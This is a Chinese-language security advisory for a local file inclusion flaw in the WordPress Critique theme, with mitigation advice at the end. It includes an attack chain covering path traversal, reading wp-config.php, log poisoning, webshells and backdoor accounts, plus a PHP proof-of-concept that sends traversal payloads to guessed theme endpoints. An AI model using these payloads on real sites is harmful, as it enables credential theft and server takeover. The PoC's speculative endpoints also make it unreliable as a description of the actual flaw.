CVE-2025-58923 WordPress Critique主题本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-58923

漏洞类型

本地文件包含(LFI)

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Critique theme (axiomthemes)

漏洞概述

CVE-2025-58923是WordPress Critique主题中的一个高危安全漏洞，CVSS评分达到8.1分。该漏洞属于PHP本地文件包含（Local File Inclusion，LFI）类型，由于Critique主题在处理文件包含请求时对用户输入的文件名缺乏充分的验证和过滤，攻击者可以利用此漏洞读取服务器上的敏感文件，包括但不限于配置文件、数据库凭证、其他站点的源代码等。Critique是一款由axiomthemes开发的WordPress评论和评价类主题，被广泛应用于需要用户评论功能的网站。该漏洞影响Critique 1.17及以下所有版本。攻击者无需任何认证即可利用此漏洞，这意味着任何访问该网站的用户都可能成为潜在的攻击者。由于WordPress主题通常具有较高的访问权限，此漏洞可能导致整个网站被攻陷，甚至进一步横向移动到服务器上的其他应用。

技术细节

该漏洞存在于Critique主题的文件处理逻辑中。攻击者可以通过构造特殊的HTTP请求，在请求参数中注入目录遍历序列（如../）和目标文件路径，实现本地文件包含。PHP的include、require、include_once或require_once等文件包含函数在处理用户可控的路径时，如果没有进行严格的路径规范化（realpath）和白名单验证，就会导致文件包含漏洞。攻击者通常会尝试读取常见的敏感文件，如：/etc/passwd（获取系统用户信息）、wp-config.php（获取WordPress数据库凭证）、.htaccess（获取重写规则和访问控制配置）等。在某些配置下，攻击者还可能通过日志文件 poisoning 或上传图片中嵌入PHP代码的方式实现远程代码执行（RCE），从而完全控制服务器。由于该主题未对输入参数进行充分的过滤，攻击者可以绕过基本的防护措施。需要注意的是，即使服务器配置了allow_url_include=Off（禁止远程文件包含），本地文件包含仍然可以利用。

攻击链分析

STEP 1

1. 信息收集

攻击者首先确认目标网站使用的WordPress版本和Critique主题版本，通过robots.txt、HTML源码或wappalyzer等工具识别技术栈

STEP 2

2. 漏洞探测

攻击者尝试访问Critique主题的各个文件包含入口点，发送带有路径遍历载荷的HTTP请求，如?template=../../../../etc/passwd

STEP 3

3. 敏感文件读取

确认漏洞存在后，攻击者读取wp-config.php获取数据库凭证，读取.htaccess获取配置信息，或读取其他敏感文件

STEP 4

4. 权限提升与远程代码执行

通过日志文件污染（/var/log/apache2/access.log注入PHP代码）或上传包含恶意代码的图片文件，然后利用LFI包含该文件实现RCE

STEP 5

5. 持久化控制

成功获取WebShell后，攻击者会尝试植入后门、创建管理员账户或修改现有文件以维持长期访问权限

STEP 6

6. 横向移动

利用获取的数据库凭证连接同一服务器上的其他数据库，或通过服务器作为跳板攻击内网其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
/**
 * CVE-2025-58923 PoC - WordPress Critique Theme Local File Inclusion
 * Target: WordPress site using Critique theme <= 1.17
 * 
 * Usage: php poc.php <target_url> <file_to_read>
 * Example: php poc.php http://target.com /etc/passwd
 */

$target = $argv[1] ?? 'http://localhost';
$file = $argv[2] ?? '/etc/passwd';

// Encode path traversal to bypass basic filters
$encoded_file = str_replace('/', '%2F', $file);
$payload = '../../../..' . $encoded_file . '%00';

// Common vulnerable endpoints in WordPress themes
$endpoints = [
    '/wp-content/themes/critique/includes/inc/ajax-actions.php',
    '/wp-content/themes/critique/core/includes/ajax-handler.php',
    '/wp-content/themes/critique/functions.php',
];

foreach ($endpoints as $endpoint) {
    $url = $target . $endpoint . '?template=' . $payload;
    echo "[*] Testing: $url\n";
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($http_code == 200 && !empty($response)) {
        echo "[!] Success! File content:\n";
        echo $response;
        break;
    }
}

// Alternative: Direct file inclusion via theme's template loader
$alt_url = $target . '/?theme_action=include&file=' . urlencode($file);
echo "[*] Alternative endpoint: $alt_url\n";
?>

影响范围

Critique theme <= 1.17

防御指南

临时缓解措施

在官方补丁发布之前，可以采取以下临时缓解措施：1）使用Web应用防火墙（如Cloudflare、Baidu Cloud Shield或自建ModSecurity）添加规则拦截包含路径遍历字符（../）和null字节的请求；2）通过.htaccess或Nginx配置限制对wp-content/themes/critique目录下PHP文件的直接访问；3）暂时禁用Critique主题，切换到其他经过安全审计的主题；4）加强服务器文件权限设置，限制Web服务用户对敏感文件的读取权限；5）启用WordPress的安全插件（如Wordfence、Sucuri）提供额外的安全防护层；6）监控服务器访问日志，关注异常的包含文件请求模式。